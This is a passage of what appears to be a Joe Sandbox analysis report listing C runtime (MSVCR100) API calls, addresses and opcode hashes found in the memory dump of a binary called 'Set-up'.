                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E), ref: 6BB9FE0B
                                                                                              Similarity
                                                                                              • API ID: Policy$Initialize$Concurrency@@Policy@Scheduler$ElementHeadKey@2@@ListValue@$??2@CountCriticalExceptionH_prolog3SectionSpinThrow$AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastV01@@_memsetmemcpystd::exception::exception
                                                                                              APIs
                                                                                              • __wsopen_s.LIBCMT(?,?,00000000,?,00000180,00000000,?,?), ref: 6BB6C801
                                                                                              Similarity
                                                                                              • API ID: __wsopen_s
                                                                                              • String ID: UNICODE$UTF-16LE$UTF-8$ccs
                                                                                              APIs
                                                                                              • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB9B88C
                                                                                                • Part of subcall function 6BB9B6C7: __EH_prolog3.LIBCMT ref: 6BB9B6CE
                                                                                              • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB9B89A
                                                                                              • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB9B8A8
                                                                                              • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB9B8B2
                                                                                              • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB9B8BC
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB9B8D1
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BB9B8E0
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentProcessorNumber), ref: 6BB9B8EF
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BB9B8F6
                                                                                              • GetLastError.KERNEL32 ref: 6BB9B900
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9B919
                                                                                              Similarity
                                                                                              • API ID: Version@$Concurrency@@Manager@1@Resource$AddressConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConcurrency::unsupported_os::unsupported_osErrorExceptionH_prolog3HandleLastModuleProcThrow
                                                                                              • String ID: GetCurrentProcessorNumber$kernel32.dll
                                                                                              • API String ID: 204447691-1711015486
                                                                                              • Opcode ID: e19464e7cc5bb9e69fcc199b5a3d55e916d705e5ca4b5b488a6d41a5241ec4da
                                                                                              • Instruction ID: 52f539fd307a2b732865b7c2cda374268a9572c9fb0e79fb4f1a23f3d654b9c6
                                                                                              • Opcode Fuzzy Hash: e19464e7cc5bb9e69fcc199b5a3d55e916d705e5ca4b5b488a6d41a5241ec4da
                                                                                              • Instruction Fuzzy Hash: 1D41D0314182C28BD720EF25E88172AB7E4FF87315F14897AF4A596141C33CD949CBA2
                                                                                              APIs
                                                                                              • free.MSVCR100(?,6BB69233,-0000006C,?,?,6BB6A4AB,-0000006C,-0000006C,?,?,6BB64ECC,-0000006C), ref: 6BB6A48E
                                                                                              • free.MSVCR100(?,6BB69233,-0000006C,?,?,6BB6A4AB,-0000006C,-0000006C,?,?,6BB64ECC,-0000006C), ref: 6BB76E9C
                                                                                              • ___free_lconv_mon.LIBCMT ref: 6BB76EA7
                                                                                              • free.MSVCR100(?,6BB69233,-0000006C,?,?,6BB6A4AB,-0000006C,-0000006C,?,?,6BB64ECC,-0000006C), ref: 6BB76EBD
                                                                                              • ___free_lconv_num.LIBCMT ref: 6BB76EC8
                                                                                              • free.MSVCR100(?,6BB69233,-0000006C,?,?,6BB6A4AB,-0000006C,-0000006C,?,?,6BB64ECC,-0000006C), ref: 6BB76ED5
                                                                                              • free.MSVCR100(?,?,6BB69233,-0000006C,?,?,6BB6A4AB,-0000006C,-0000006C,?,?,6BB64ECC,-0000006C), ref: 6BB76EE0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$___free_lconv_mon___free_lconv_num
                                                                                              • String ID:
                                                                                              • API String ID: 2838340673-0
                                                                                              • Opcode ID: bc2212bb67cfc9f42f03ded92e5abec5d033d8b52a64ccedec0160ca487c8841
                                                                                              • Instruction ID: db824adb0cce9594b1582ce1f885421fe6694e0ed168a58beef606793671cc0f
                                                                                              • Opcode Fuzzy Hash: bc2212bb67cfc9f42f03ded92e5abec5d033d8b52a64ccedec0160ca487c8841
                                                                                              • Instruction Fuzzy Hash: 7F316E725083C1DFDB20AF75DD89A5A77EAEF00394F50087AE16997160FB3DAD808B21
                                                                                              APIs
                                                                                              • _calloc_crt.MSVCR100(00000001,00000050), ref: 6BB67FAC
                                                                                              • _malloc_crt.MSVCR100(00000004), ref: 6BB67FBF
                                                                                                • Part of subcall function 6BB60CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60CE5
                                                                                              • _malloc_crt.MSVCR100(00000004), ref: 6BB67FDD
                                                                                                • Part of subcall function 6BB6767A: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB676C4
                                                                                                • Part of subcall function 6BB6767A: _calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 6BB676D3
                                                                                                • Part of subcall function 6BB6767A: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB676EC
                                                                                              • free.MSVCR100(00000000), ref: 6BB9170F
                                                                                              • free.MSVCR100(00000000), ref: 6BB91718
                                                                                              • free.MSVCR100(?,00000000), ref: 6BB91720
                                                                                              • ___free_lconv_mon.LIBCMT ref: 6BB91729
                                                                                              • free.MSVCR100(00000000,00000000), ref: 6BB9172F
                                                                                              • free.MSVCR100(?,00000000,00000000), ref: 6BB91737
                                                                                              • free.MSVCR100(?,?,00000000,00000000), ref: 6BB9173F
                                                                                              • free.MSVCR100(?), ref: 6BB9174F
                                                                                              • free.MSVCR100(?,?), ref: 6BB9175A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$InfoLocale_calloc_crt_malloc_crt$___free_lconv_monmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 1432309319-0
                                                                                              • Opcode ID: 020991a61e210b4e05efe26b82703e520435f5d4ee2bd0ec014dd2f312032c8e
                                                                                              • Instruction ID: d862c8bd7d2f374d2c97b47fadc1b6f4a11e7312a48b3293371a681c6b712547
                                                                                              • Opcode Fuzzy Hash: 020991a61e210b4e05efe26b82703e520435f5d4ee2bd0ec014dd2f312032c8e
                                                                                              • Instruction Fuzzy Hash: 71B163B2940259AEE711CFB5CC81FEB77ADEB49780F140466FA05DB185FAB4DA408B60
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _fileno$__cftof
                                                                                              • String ID:
                                                                                              • API String ID: 813615167-0
                                                                                              • Opcode ID: fee85dbb746cc57822a84aa5661fc8014223f5e4df4e44d7eef2da69b4267393
                                                                                              • Instruction ID: 1cc799a3b867697b2fe364f274530ca2b6049623085b5d73cf88b11722c176ef
                                                                                              • Opcode Fuzzy Hash: fee85dbb746cc57822a84aa5661fc8014223f5e4df4e44d7eef2da69b4267393
                                                                                              • Instruction Fuzzy Hash: FE4104321046E59EC7259F38DC829AE37B4DE46764364076AE5709F1D0EB3CDE42CB90
                                                                                              APIs
                                                                                              • __set_flsgetvalue.MSVCR100(6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6206A
                                                                                                • Part of subcall function 6BB6067B: TlsGetValue.KERNEL32(?,6BB606AF), ref: 6BB60684
                                                                                              • TlsGetValue.KERNEL32(6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6207B
                                                                                              • _calloc_crt.MSVCR100(00000001,00000214), ref: 6BB6208E
                                                                                              • DecodePointer.KERNEL32(00000000), ref: 6BB620AC
                                                                                              • _initptd.MSVCR100(00000000,00000000), ref: 6BB620BE
                                                                                                • Part of subcall function 6BB6215F: GetModuleHandleW.KERNEL32(KERNEL32.DLL,6BB62200,00000008,6BB875E9,00000000,00000000), ref: 6BB62170
                                                                                                • Part of subcall function 6BB6215F: _lock.MSVCR100(0000000D), ref: 6BB621A4
                                                                                                • Part of subcall function 6BB6215F: InterlockedIncrement.KERNEL32(?), ref: 6BB621B1
                                                                                                • Part of subcall function 6BB6215F: _lock.MSVCR100(0000000C), ref: 6BB621C5
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BB620C5
                                                                                              • __freeptd.LIBCMT ref: 6BB625B1
                                                                                              • __heap_init.LIBCMT ref: 6BB6B235
                                                                                              • GetCommandLineA.KERNEL32(6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B266
                                                                                              • GetCommandLineW.KERNEL32 ref: 6BB6B271
                                                                                              • __ioterm.LIBCMT ref: 6BB780B2
                                                                                              • free.MSVCR100(00000000), ref: 6BB87485
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CommandLineValue_lock$CurrentDecodeHandleIncrementInterlockedModulePointerThread__freeptd__heap_init__ioterm__set_flsgetvalue_calloc_crt_initptdfree
                                                                                              • String ID:
                                                                                              • API String ID: 2121586863-0
                                                                                              • Opcode ID: 28f943b628af99a16f581e468e2fd51ab3cb885a4809a5ac1eabb1803253b8ca
                                                                                              • Instruction ID: bd07b703933d4d23dc0e4314a52826572615b7f4992468d625a3bac775ef4273
                                                                                              • Opcode Fuzzy Hash: 28f943b628af99a16f581e468e2fd51ab3cb885a4809a5ac1eabb1803253b8ca
                                                                                              • Instruction Fuzzy Hash: 6331A13190A6C19EEB313FB68D5261E3BB0EF46798B24456AD865C1040FF7EC9808B67
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameName::Name::operator=
                                                                                              • String ID: class $coclass $cointerface $enum $struct $union $unknown ecsu'
                                                                                              • API String ID: 1765408024-3025788322
                                                                                              • Opcode ID: 12b504797490e1a7e06e4da1dc07632fe639a882a4c9c486205be9abf8268f98
                                                                                              • Instruction ID: e418d83c3cb50d1ab9c31be700b0acef5730305433c33d60650b0eba4cdabcd8
                                                                                              • Opcode Fuzzy Hash: 12b504797490e1a7e06e4da1dc07632fe639a882a4c9c486205be9abf8268f98
                                                                                              • Instruction Fuzzy Hash: 9D317E35940589AFCF04DFACD851AAEB7B5FB45795F1044ABE825A7240EB38DE00CB60
                                                                                              APIs
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000008,ECA782CA,?,?), ref: 6BBA0169
                                                                                                • Part of subcall function 6BB602C1: malloc.MSVCR100(?), ref: 6BB602CC
                                                                                              • ?GetProcessorNodeCount@Concurrency@@YAIXZ.MSVCR100(ECA782CA,?,?), ref: 6BBA01A4
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,ECA782CA,?,?), ref: 6BBA01BD
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,ECA782CA,?,?), ref: 6BBA01D8
                                                                                              • _memset.LIBCMT(?,00000000,?,ECA782CA,?,?), ref: 6BBA01EC
                                                                                              • _memset.LIBCMT(?,00000000,?,ECA782CA,?,?), ref: 6BBA01FF
                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,7FFFFFFF,00000000,?,?,?,ECA782CA,?,?), ref: 6BBA024F
                                                                                              • GetLastError.KERNEL32(?,?,?,ECA782CA,?,?), ref: 6BBA025F
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,ECA782CA,?,?), ref: 6BBA0278
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,?,?,ECA782CA,?,?), ref: 6BBA0287
                                                                                              • ??2@YAPAXI@Z.MSVCR100(0000000C,?,?,?,ECA782CA,?,?), ref: 6BBA028E
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00004004,?,?,?,ECA782CA,?,?), ref: 6BBA02B0
                                                                                              • _memset.LIBCMT(00000000,00000000,00004004,?,?,?,ECA782CA,?,?), ref: 6BBA02C1
                                                                                                • Part of subcall function 6BBA16DE: _memset.LIBCMT(?,00000000,0000003E,00000000,00000000), ref: 6BBA16FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$??2@$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConcurrency@@Count@CreateErrorExceptionLastNodeProcessorSemaphoreThrowmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 1488694034-0
                                                                                              • Opcode ID: 669d2f5ba92d37a543ba7d8e317cc681946b6bd4b4555842f44adaa0d82b91e9
                                                                                              • Instruction ID: ab310dabe969bc400a90d5da8155fa73ab2471e50efef7424fddfcb8665134bc
                                                                                              • Opcode Fuzzy Hash: 669d2f5ba92d37a543ba7d8e317cc681946b6bd4b4555842f44adaa0d82b91e9
                                                                                              • Instruction Fuzzy Hash: 1651C5B15057819FD724CF38C882B2ABBE4FF49354F104A3EE15AC7690EB39E8418B54
                                                                                              APIs
                                                                                              • _strnlen.LIBCMT(?,?), ref: 6BB74F26
                                                                                              • __crtLCMapStringA.MSVCR100(?,?,00000100,?,000000FF,00000000,00000000,?,00000001), ref: 6BB74F5A
                                                                                              • __crtLCMapStringA.MSVCR100(?,?,00000100,?,000000FF,00000000,00000000,?,00000001), ref: 6BB74FD5
                                                                                              • strcpy_s.MSVCR100(?,?,00000000), ref: 6BB74FEC
                                                                                              • _freea_s.MSVCR100(00000000), ref: 6BB74FF9
                                                                                              • _errno.MSVCR100 ref: 6BB8C372
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB8C37C
                                                                                              • _errno.MSVCR100 ref: 6BB8C3AD
                                                                                              • _errno.MSVCR100 ref: 6BB8C3B8
                                                                                              • _errno.MSVCR100 ref: 6BB8C3C7
                                                                                              • malloc.MSVCR100(00000008), ref: 6BB8C3D1
                                                                                              • _errno.MSVCR100 ref: 6BB8C3EA
                                                                                              • _errno.MSVCR100 ref: 6BB8C3F7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              APIs
                                                                                              • wcsnlen.MSVCR100(?,?,?,?,?,?,?,?,6BB63C95,?,?,?), ref: 6BB63C1B
                                                                                              • _errno.MSVCR100(?,?,?,?,?,?,6BB63C95,?,?,?), ref: 6BB8C5A3
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6BB63C95,?,?,?), ref: 6BB8C5AD
                                                                                              • ___crtLCMapStringW.LIBCMT(?,00000100,?,000000FF,00000000,00000000,?,?,?,?,?,?,6BB63C95,?,?,?), ref: 6BB8C5CA
                                                                                              • _errno.MSVCR100(?,?,6BB63C95,?,?,?), ref: 6BB8C5DB
                                                                                              • _errno.MSVCR100(?,?,6BB63C95,?,?,?), ref: 6BB8C5E6
                                                                                              • _errno.MSVCR100(?,?,6BB63C95,?,?,?), ref: 6BB8C5FC
                                                                                              • malloc.MSVCR100(00000008,?,?,6BB63C95,?,?,?), ref: 6BB8C634
                                                                                              • _errno.MSVCR100(?,?,6BB63C95,?,?,?), ref: 6BB8C650
                                                                                              • ___crtLCMapStringW.LIBCMT(?,00000100,?,000000FF,00000000,00000000,?,?,6BB63C95,?,?,?), ref: 6BB8C66B
                                                                                              • wcscpy_s.MSVCR100(?,?,00000000,?,?,?,?,?,?,?,?,6BB63C95,?,?,?), ref: 6BB8C67C
                                                                                              • _freea_s.MSVCR100(00000000,?,?,?,?,?,?,?,?,6BB63C95,?,?,?), ref: 6BB8C695
                                                                                              APIs
                                                                                              • wcsnlen.MSVCR100(?,?,?,?,?,?,?,?,6BB6CD55,?,?,?), ref: 6BB6CCE8
                                                                                              • _errno.MSVCR100(?,?,?,?,?,?,6BB6CD55,?,?,?), ref: 6BB8C84E
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6BB6CD55,?,?,?), ref: 6BB8C858
                                                                                              • ___crtLCMapStringW.LIBCMT(?,00000200,?,000000FF,00000000,00000000,?,?,?,?,?,?,6BB6CD55,?,?,?), ref: 6BB8C875
                                                                                              • _errno.MSVCR100(?,?,6BB6CD55,?,?,?), ref: 6BB8C886
                                                                                              • _errno.MSVCR100(?,?,6BB6CD55,?,?,?), ref: 6BB8C891
                                                                                              • _errno.MSVCR100(?,?,6BB6CD55,?,?,?), ref: 6BB8C8A7
                                                                                              • malloc.MSVCR100(00000008,?,?,6BB6CD55,?,?,?), ref: 6BB8C8DF
                                                                                              • _errno.MSVCR100(?,?,6BB6CD55,?,?,?), ref: 6BB8C8FB
                                                                                              • ___crtLCMapStringW.LIBCMT(?,00000200,?,000000FF,00000000,00000000,?,?,6BB6CD55,?,?,?), ref: 6BB8C916
                                                                                              • wcscpy_s.MSVCR100(?,?,00000000,?,?,?,?,?,?,?,?,6BB6CD55,?,?,?), ref: 6BB8C927
                                                                                              • _freea_s.MSVCR100(00000000,?,?,?,?,?,?,?,?,6BB6CD55,?,?,?), ref: 6BB8C940
                                                                                              APIs
                                                                                              • _malloc_crt.MSVCR100(00000355,00000000,6BB64E81,00000001,00000000,00000000), ref: 6BB649DC
                                                                                                • Part of subcall function 6BB60CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60CE5
                                                                                                • Part of subcall function 6BB6498E: strcat_s.MSVCR100(6BB65C30,6BB65C0F,6BB65C20,?,00000083,00000083,?,6BB65C24,6BB65C0F,6BB65C30,00000002,6BB65C30,6BB65C0F,?,00000000,00000000), ref: 6BB649AD
                                                                                              • strcat_s.MSVCR100(00000004,00000351,6BB6498C,?,?,?,?,?,00000000,6BB64E81,00000001,00000000), ref: 6BB64A29
                                                                                              • strcmp.MSVCR100(00000000,00000010,?,?,?,?,?,?,?,?,00000000,6BB64E81,00000001,00000000), ref: 6BB64A46
                                                                                              • free.MSVCR100(6BB64E81,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BB64A8D
                                                                                              • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6BB64E81,00000001), ref: 6BB90BD9
                                                                                              • free.MSVCR100(?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6BB64E81), ref: 6BB90BE1
                                                                                              APIs
                                                                                              • _lock.MSVCR100(0000000D,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB62497
                                                                                                • Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB624A9
                                                                                              • _lock.MSVCR100(0000000C,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB624C5
                                                                                              • free.MSVCR100(00000000,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB624F9
                                                                                              • free.MSVCR100(00000000), ref: 6BB87615
                                                                                              • free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB87621
                                                                                              • free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB8762D
                                                                                              • free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB87639
                                                                                              • free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB87645
                                                                                              • free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB87651
                                                                                              • free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB8765D
                                                                                              • free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB87669
                                                                                              • free.MSVCR100(?,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB87675
                                                                                              APIs
                                                                                              • GetFullPathNameA.KERNEL32(?,?,00000000,?), ref: 6BB72A42
                                                                                              • GetFullPathNameA.KERNEL32(?,00000000,00000000,00000000), ref: 6BB87A58
                                                                                              • GetLastError.KERNEL32 ref: 6BB87A5E
                                                                                              • __dosmaperr.LIBCMT(00000000), ref: 6BB87A65
                                                                                              • _errno.MSVCR100 ref: 6BB87A7F
                                                                                              • calloc.MSVCR100(?,00000001), ref: 6BB87A94
                                                                                              • _errno.MSVCR100 ref: 6BB87AA5
                                                                                              • _errno.MSVCR100 ref: 6BB87AB2
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB87ABD
                                                                                              • free.MSVCR100(00000000), ref: 6BB87ACB
                                                                                              • _errno.MSVCR100 ref: 6BB87AD1
                                                                                              • free.MSVCR100(00000000), ref: 6BB87AE8
                                                                                              • _getcwd.MSVCR100(?,?), ref: 6BB87AF9
                                                                                              APIs
                                                                                              • GetFullPathNameW.KERNEL32(?,?,00000000,?), ref: 6BB61EA6
                                                                                              • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000), ref: 6BB87B41
                                                                                              • GetLastError.KERNEL32 ref: 6BB87B47
                                                                                              • __dosmaperr.LIBCMT(00000000), ref: 6BB87B4E
                                                                                              • _errno.MSVCR100 ref: 6BB87B6B
                                                                                              • calloc.MSVCR100(?,00000002), ref: 6BB87B80
                                                                                              • _errno.MSVCR100 ref: 6BB87B91
                                                                                              • _errno.MSVCR100 ref: 6BB87B9E
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB87BA9
                                                                                              • free.MSVCR100(00000000), ref: 6BB87BB7
                                                                                              • _errno.MSVCR100 ref: 6BB87BBD
                                                                                              • free.MSVCR100(00000000), ref: 6BB87BD4
                                                                                              • _wgetcwd.MSVCR100(?,?), ref: 6BB87BE5
                                                                                              APIs
                                                                                              Strings
                                                                                              • `non-type-template-parameter, xrefs: 6BB8D126
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: _getptd$MatchType
                                                                                              • String ID: MOC$RCC$csm$csm
                                                                                              Similarity
                                                                                              • API ID: NameName::operator+
                                                                                              • String ID: cli::array<$cli::pin_ptr<$void$void
                                                                                              APIs
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB67493
                                                                                              • free.MSVCR100(?), ref: 6BB6749F
                                                                                              • free.MSVCR100(?,?), ref: 6BB674AA
                                                                                              • _calloc_crt.MSVCR100(00000001,00000050), ref: 6BB68292
                                                                                              • _malloc_crt.MSVCR100(00000004), ref: 6BB682B2
                                                                                                • Part of subcall function 6BB60CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60CE5
                                                                                              • _malloc_crt.MSVCR100(00000004), ref: 6BB682D5
                                                                                              • free.MSVCR100(00000000), ref: 6BB91699
                                                                                              • free.MSVCR100(00000000), ref: 6BB916A5
                                                                                              • free.MSVCR100(?,00000000), ref: 6BB916AD
                                                                                              • ___free_lconv_num.LIBCMT ref: 6BB916BC
                                                                                                • Part of subcall function 6BB6767A: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB676C4
                                                                                                • Part of subcall function 6BB6767A: _calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 6BB676D3
                                                                                                • Part of subcall function 6BB6767A: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB676EC
                                                                                              Similarity
                                                                                              • API ID: free$InfoLocale_calloc_crt_malloc_crt$DecrementInterlocked___free_lconv_nummalloc
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BBA2461
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,00000000,6BB9D96F,00000000,?,00000000,00000000), ref: 6BBA248C
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001,?,00000000,00000000), ref: 6BBA24E7
